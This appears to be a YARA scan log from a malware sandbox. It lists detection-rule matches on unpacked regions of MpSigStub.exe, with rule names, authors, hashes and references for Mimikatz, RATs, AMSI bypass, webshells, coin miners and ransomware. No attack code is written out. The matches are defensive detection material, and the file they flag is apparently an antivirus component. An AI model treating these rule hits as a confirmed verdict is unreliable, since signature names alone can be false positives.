Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd0ce56a.155.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bda7e4ba.61.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138bdfb53f6.75.unpack, type: UNPACKEDPE	Matched rule: Msfpayloads_msf_10 date = 2017-02-09, hash1 = 3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082, author = Florian Roth, description = Metasploit Payloads - file msf.exe, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 38.3.MpSigStub.exe.138bd21de7c.196.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd1720c9.183.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb54b5.125.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdbb68b9.112.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bce160d6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138bd0cfd72.157.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb7ebd.111.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd1720c9.207.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd16fc75.208.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd16fc75.184.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138bd21de7c.209.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 38.3.MpSigStub.exe.138be3e4c13.121.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138be5658a9.38.raw.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be5658a9.38.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bdbb7ebd.150.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bdbb54b5.110.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bda7fcc2.60.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
